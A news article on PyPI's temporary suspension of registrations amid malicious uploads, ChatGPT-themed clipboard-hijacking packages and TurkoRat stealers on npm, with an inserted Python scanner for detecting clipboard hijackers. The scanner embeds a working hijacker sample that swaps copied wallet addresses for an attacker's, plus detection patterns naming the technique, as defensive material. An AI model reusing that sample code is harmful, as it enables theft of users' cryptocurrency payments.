PyPI repository restored after temporarily suspending new activity

In a notice released on 20th May, the PyPI admins said the volume of malicious users and malicious projects created on the index "in the past week" had outpaced their ability to respond in a timely fashion.


The problem was exacerbated by several administrators being absent at the time.


While the admins gave no specifics about the malicious activity or the actors behind it, reports suggested that an automated attack was behind the surge in registrations.


"While we re-group over the weekend, new user and new project registration is temporarily suspended," the admins added.


The suspension lasted approximately 29 hours; the status page now notes that it has been lifted and that new user and project registration is available again.


Similar to other open-source registries, PyPI has encountered instances of adversaries exploiting it to distribute malware.


A recent discovery by supply-chain security firm Phylum revealed an ongoing malware campaign that uses OpenAI ChatGPT-themed lures.


The lures entice developers into installing a malicious Python module. The module reads clipboard content and can replace a copied wallet address with one the attackers control, allowing them to hijack cryptocurrency transactions.
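Clipboard hijackers of the kind described above need two things in the same module: a way to read and write the clipboard, and a hard-coded destination wallet to swap in. The scanner below is an added example, not code from the article, from Phylum or from the malicious package itself; it checks Python package sources for that combination. The API list, the address regexes and the three sample modules (including the placeholder attacker address) are constructed for the demonstration and are assumptions, not data from any real package.

```python
"""Heuristic scanner for clipboard-hijacking code in Python package sources.

Added example (not the article's or Phylum's code). A clipboard hijacker must
read what the victim copied and write back the attacker's wallet, so a module
that combines clipboard access with a hard-coded cryptocurrency address is
worth a human look. Everything below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass, field

# Clipboard access APIs commonly reachable from Python (assumed list, not exhaustive).
CLIPBOARD_PATTERNS = {
    "pyperclip": re.compile(r"\bpyperclip\.(paste|copy)\s*\("),
    "win32clipboard": re.compile(r"\bwin32clipboard\.(Get|Set)ClipboardData\s*\("),
    "tkinter": re.compile(r"\.clipboard_(get|append|clear)\s*\("),
    "cli-tools": re.compile(r"\b(pbpaste|pbcopy|xclip|xsel)\b"),
}

# Well-known address formats: these are the literals a hijacker has to embed
# as the replacement destination.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc-bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{25,62}\b"),
    "eth": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
}

# Hijackers poll the clipboard continuously so they catch an address the
# moment it is copied; an unbounded loop is a supporting indicator.
LOOP_PATTERN = re.compile(r"\bwhile\s+(True|1)\b")


@dataclass
class Finding:
    module: str
    clipboard_apis: list = field(default_factory=list)
    addresses: list = field(default_factory=list)   # (format, literal) pairs
    polling_loop: bool = False

    @property
    def verdict(self) -> str:
        if self.clipboard_apis and self.addresses:
            return "suspicious"      # reads the clipboard and carries a wallet
        if self.clipboard_apis:
            return "clipboard-only"  # legitimate copy helpers look like this
        return "clean"


def scan_source(module: str, source: str) -> Finding:
    """Return which hijacker indicators a single module's source contains."""
    finding = Finding(module)
    for name, pattern in CLIPBOARD_PATTERNS.items():
        if pattern.search(source):
            finding.clipboard_apis.append(name)
    for name, pattern in ADDRESS_PATTERNS.items():
        for match in pattern.finditer(source):
            finding.addresses.append((name, match.group(0)))
    finding.polling_loop = bool(LOOP_PATTERN.search(source))
    return finding


def scan_package(modules: dict) -> list:
    """Scan every module of a package; return the findings that are not clean."""
    findings = [scan_source(name, src) for name, src in modules.items()]
    return [f for f in findings if f.verdict != "clean"]


# Constructed sample modules. The wallet below is a placeholder, not a real address.
CLEAN = '''
def add(a, b):
    return a + b
'''

BENIGN = '''
import pyperclip
def copy_token(token):
    pyperclip.copy(token)  # convenience helper, no wallet involved
'''

HIJACKER = '''
import re, time, pyperclip
WALLET = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"   # attacker-controlled
ETH = re.compile(r"0x[a-fA-F0-9]{40}")
while True:
    data = pyperclip.paste()
    if ETH.fullmatch(data) and data != WALLET:
        pyperclip.copy(WALLET)   # swap the victim's destination for ours
    time.sleep(0.5)
'''

if __name__ == "__main__":
    for f in scan_package({"util.py": CLEAN, "clip.py": BENIGN, "__init__.py": HIJACKER}):
        print(f.module, f.verdict, f.clipboard_apis, f.addresses, f.polling_loop)
```

Run it on an unpacked sdist or wheel by reading each `.py` file into the `modules` dict. The "clipboard-only" verdict is deliberately separate from "suspicious": plenty of legitimate tooling copies to the clipboard, and the address literal is what turns that into an indicator worth escalating.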


In a similar finding, two malicious packages were detected in the npm registry that delivered an open-source information stealer known as TurkoRat.


The packages, nodejs-encrypt-agent and nodejs-cookie-proxy-agent, were accessible for over two months before being discovered and removed. During that time, they were collectively downloaded around 1,200 times.


ReversingLabs, which analysed the campaign, said TurkoRat is an information stealer designed to collect sensitive data, including login credentials, website cookies and information from cryptocurrency wallets.

